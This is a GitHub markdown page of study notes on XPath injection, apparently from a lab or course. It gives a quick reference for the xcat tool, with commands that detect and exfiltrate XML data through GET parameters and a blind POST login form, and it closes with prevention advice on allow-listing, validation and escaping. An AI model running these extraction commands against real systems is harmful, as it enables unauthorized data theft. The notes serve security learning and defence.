Skip to content

prevention-and-tools.md

Latest commit

 

History

History
75 lines (54 loc) · 2.25 KB

prevention-and-tools.md

File metadata and controls

75 lines (54 loc) · 2.25 KB

XPath Injection – Prevention & Tools

Tools: xcat quick reference

Install:

pip3 install cython
pip3 install xcat

General help:

xcat --help
# commands: detect, injections, ip, run, shell

Detect classic data exfiltration (GET)

Vulnerable param is q, but app also needs f. True when response does NOT contain "No Result" (negated true-string with !).

xcat detect "http://<SERVER_IP>:<PORT>/index.php" q "q=BAR" "f=fullstreetname" \
  --true-string='!No Result'

Also test f as injectable:

xcat detect "http://<SERVER_IP>:<PORT>/index.php" f "q=BAR" "f=fullstreetname" \
  --true-string='!No Result'

Exfiltrate whole XML (can be slow for big docs):

xcat run "http://<SERVER_IP>:<PORT>/index.php" q "q=BAR" "f=fullstreetname" \
  --true-string='!No Result'

Blind injection (POST form)

Injection point: username (POST). Positive text contains "successfully".

xcat detect "http://<SERVER_IP>:<PORT>/index.php" username "username=admin" \
  -m POST --encode FORM --true-string=successfully

Dump via blind exfiltration (can take time):

xcat run "http://<SERVER_IP>:<PORT>/index.php" username "username=admin" \
  -m POST --encode FORM --true-string=successfully

Prevention

Prefer allow-listing and strict parsing over ad-hoc escaping. Treat any input interpolated into XPath as untrusted.

  • Input allow-listing:
    • Permit only safe characters (e.g., ^[A-Za-z0-9 _-]+$) for fields used inside XPath.
  • Type/format validation:
    • Enforce numeric types where expected (reject non-digits), validate lengths/ranges.
  • Semantic constraints:
    • For selector-like params (e.g., f), enforce fixed enum: {fullstreetname, streetname}.
  • Avoid string concatenation:
    • Use library functions that build XPath safely or pre-map user choices to constant query fragments.
  • Escaping (fallback when unavoidable):
    • Escape quotes '", brackets [](), wildcard *, slash /, at @, equals =. Avoid double-escaping.
  • Defense in depth:
    • Centralize validation, log rejects, rate-limit suspicious activity, add WAF rules for XPath metacharacters.

Note: Unlike SQL, prepared statements for XPath are not universally available; explicit validation and controlled composition are key.